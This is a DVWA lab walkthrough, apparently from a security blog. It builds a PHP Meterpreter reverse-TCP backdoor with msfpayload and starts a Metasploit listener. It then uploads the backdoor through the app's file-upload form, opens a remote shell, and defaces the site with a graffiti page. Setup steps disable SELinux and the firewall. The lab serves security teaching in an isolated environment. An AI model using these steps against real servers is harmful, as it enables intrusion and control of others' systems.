Hướng Dẫn Thực Hành -Upload PHP Backdoor Payload (DVWA): Lesson 8

Section 0. Background Information

What is Damn Vulnerable Web App (DVWA)?
- Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable.
- Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.
Pre-Requisite Labs
- Damn Vulnerable Web App (DVWA): Lesson 1: How to Install DVWA in Fedora 14

Lab Notes
- In this lab we will do the following:
  1. We will create a php/meterpreter/reverse_tcp payload
  2. We will start the php/meterpreter/reverse_tcp listener
  3. We will upload the PHP payload to the DVWA Upload screen
  4. We will use the PHP payload to establish a connection to the DVWA (Fedora14) machine.

Legal Disclaimer

Section 1. Configure Fedora14 Virtual Machine Settings

Open Your VMware Player
- Instructions:
  1. On Your Host Computer, Go To
  2. Start --> All Program --> VMWare --> VMWare Player
Edit BackTrack Virtual Machine Settings
- Instructions:
  1. Highlight fedora14
  2. Click Edit virtual machine settings
Edit Network Adapter

Instructions:
1. Highlight Network Adapter
2. Select Bridged
3. Click on the OK Button.

Section 2. Login to Fedora14

Start Fedora14 VM Instance
- Instructions:
  1. Start Up VMWare Player
  2. Select Fedora14
  3. Play virtual machine
Login to Fedora14
- Instructions:
  1. Login: student
  2. Password: <whatever you set it to>.

Section 3. Open Console Terminal and Retrieve IP Address

Start a Terminal Console
- Instructions:
  1. Applications --> Terminal
Switch user to root
- Instructions:
  1. su - root
  2. <Whatever you set the root password to>
Get IP Address
- Instructions:
  1. ifconfig -a
- Notes:
  - As indicated below, my IP address is 192.168.1.106.
  - Please record your IP address.

Section 4. Temporarily Disable SELINUX and Firewall

Start a Terminal Console
- Instructions:
  1. sestatus
  2. If SELinux status: is set to disabled OR if Current mode: is set to permissive, then skip the next steps, and Continue to the Next Section.
  3. If SELinux status: is set to enabled AND if Current mode: is set to enforcing, then Continue the next steps.
- Notes:
  - In my case, I need to temporarily put selinux in permissive mode to demonstrate basic attacks on DVWA.
Place selinux in permissive mode
- Instructions:
  1. echo 0 > /selinux/enforce
    - Placing a "0" in the enforce file, puts selinux in permissive mode.
  2. sestatus
    - Notice that "Current mode:" changed to permissive.
Disable Firewall
- Instructions:
  1. service iptables save
    - This is not really necessary, unless you have made recent changes to the firewall.
  2. service iptables stop
    - This command disables the firewall.

Section 5. Fix Upload Ownership and Permissions

Fix Ownership and Permissions
- Instructions:
  1. Bring up a Terminal Console on the DVWA (Fedora14) machine.
  2. chown root:apache /var/www/html/dvwa/hackable/uploads/
  3. chmod 775 /var/www/html/dvwa/hackable/uploads/
  4. ls -ld /var/www/html/dvwa/hackable/uploads/
- Known Issue:
  1. By default, the /var/www/html/dvwa/hackable/uploads/ directory is user and group owned by root.
  2. In addition, the apache user did not have "write" permission to allow a user to place a file in the hackable/uploads directory.

Section 6. Configure BackTrack Virtual Machine Settings

Open Your VMware Player
- Instructions:
  1. On Your Host Computer, Go To
  2. Start --> All Program --> VMWare --> VMWare Player
Edit BackTrack Virtual Machine Settings
- Instructions:
  1. Highlight BackTrack5R1
  2. Click Edit virtual machine settings
Edit Network Adapter
- Instructions:
  1. Highlight Network Adapter
  2. Select Bridged
  3. Do not Click on the OK Button.

Section 7. Login to BackTrack

Start BackTrack VM Instance
- Instructions:
  1. Start Up VMWare Player
  2. Select BackTrack5R1
  3. Play virtual machine
Login to BackTrack
- Instructions:
  1. Login: root
  2. Password: toor or <whatever you changed it to>.
Bring up the GNOME
- Instructions:
  1. Type startx

Section 8. Open Console Terminal and Retrieve IP Address

Open a console terminal
- Instructions:
  1. Click on the console terminal
Get IP Address
- Instructions:
  1. ifconfig -a
- Notes:
  - As indicated below, my IP address is 192.168.1.105.
  - Please record your IP address.

Section 9. Build PHP msfpayload

Open a console terminal
- Instructions:
  1. Click on the console terminal
Create msfpayload
- Instructions:
  1. mkdir -p /root/backdoor
  2. cd /root/backdoor
  3. msfpayload php/meterpreter/reverse_tcp LHOST=192.168.1.105 LPORT=4444 R > PHONE_HOME.php
    1. Obtain the BackTrack IP Address from (Section 8, Step 2).
  4. ls -l PHONE_HOME.php
Edit PHONE_HOME.php
- Instructions:
  1. vi PHONE_HOME.php
Remove the "#" character
- Instructions:
  1. Press "x" to delete the "#" character on the first line.
  2. Press <Esc>
  3. Type ":wq!"

Section 10. Start PHP Payload Listener

Open a console terminal
- Instructions:
  1. Click on the console terminal
Start msfconsole
- Instructions:
  1. msfconsole
Start PHP Listener
- Instructions:
  1. use exploit/multi/handler
  2. set PAYLOAD php/meterpreter/reverse_tcp
  3. set LHOST 192.168.1.105
    - Obtain the BackTrack IP Address from (Section 8, Step 2).
  4. set LPORT 4444
  5. exploit
  6. Continue to Next Section

Section 11. Login to DVWA

Start Firefox
- Instructions:
  1. Click on Firefox
Login to DVWA
- Instructions:
  1. Start up Firefox on BackTrack
  2. Place http://192.168.1.106/dvwa/login.php in the address bar.
    - Replace 192.168.1.106 with Fedora's IP address obtained in (Section 3, Step 3).
  3. Login: admin
  4. Password: password
  5. Click on Login

Section 12. Set Security Level

Set DVWA Security Level
- Instructions:
  1. Click on DVWA Security, in the left hand menu.
  2. Select "low"
  3. Click Submit

Section 13. Upload PHP Payload

Upload Menu
- Instructions:
  1. Select "Upload" from the left navigation menu.
  2. Click Browse
Navigate to PHONE_HOME.php
- Instructions:
  1. Click on File System
  2. Click on root
  3. Click on backdoor
  4. Select Open
Upload PHONE_HOME.php
- Instructions:
  1. Click the Upload button
Activate PHONE_HOME.php
- Instructions:
  1. http://192.168.1.106/dvwa/hackable/uploads/
    - This is the IP address of the DVWA (Fedora14) machine obtained in (Section 3, Step 3).
  2. Click on PHONE_HOME.php
  3. Continue to next step
Connection Established
- Notes:
  1. Notice the stage was sent to the DVWA machine (Fedora14) along with the handy dandy meterpreter.
  2. Continue to next step.
Establishing a Shell
- Instructions:
  1. shell
    - Establishes a "sh" shell.
  2. uptime
    - How long has the server been up
  3. pwd
    - Current working directory
  4. whoami
    - Show who am I logged in as.
  5. w
    - Notice there is no entry for the user apache
  6. echo "Hacked at 4-23-2012, by Your Name" > hacked.html
    - Create some simple web graffiti
    - Replace 4-23-2012 with the present date.
    - Replace the string "Your Name" with your actual name.
  7. ls -l

Section 14. Proof of Lab

Proof of Lab
- Proof of Lab Instructions:
  1. On BackTrack, place the below URI in Firefox
    - http://192.168.1.106/dvwa/hackable/uploads/hacked.html
      - Replace the above IP address with the IP Address obtained in (Section 3, Step 3).
  2. Do a <PrtScn>
  3. Paste into a word document
  4. Email to Csirt247@Gmail.Com

an toan thong tin

Giới thiệu về tôi

Lưu trữ Blog

Hướng Dẫn Thực Hành -Upload PHP Backdoor Payload (DVWA): Lesson 8

Written By Unknown on Thứ Hai, 18 tháng 11, 2013 | 21:50

0 nhận xét:

Đăng nhận xét

BackTrack

Metasploit

Web

DVWA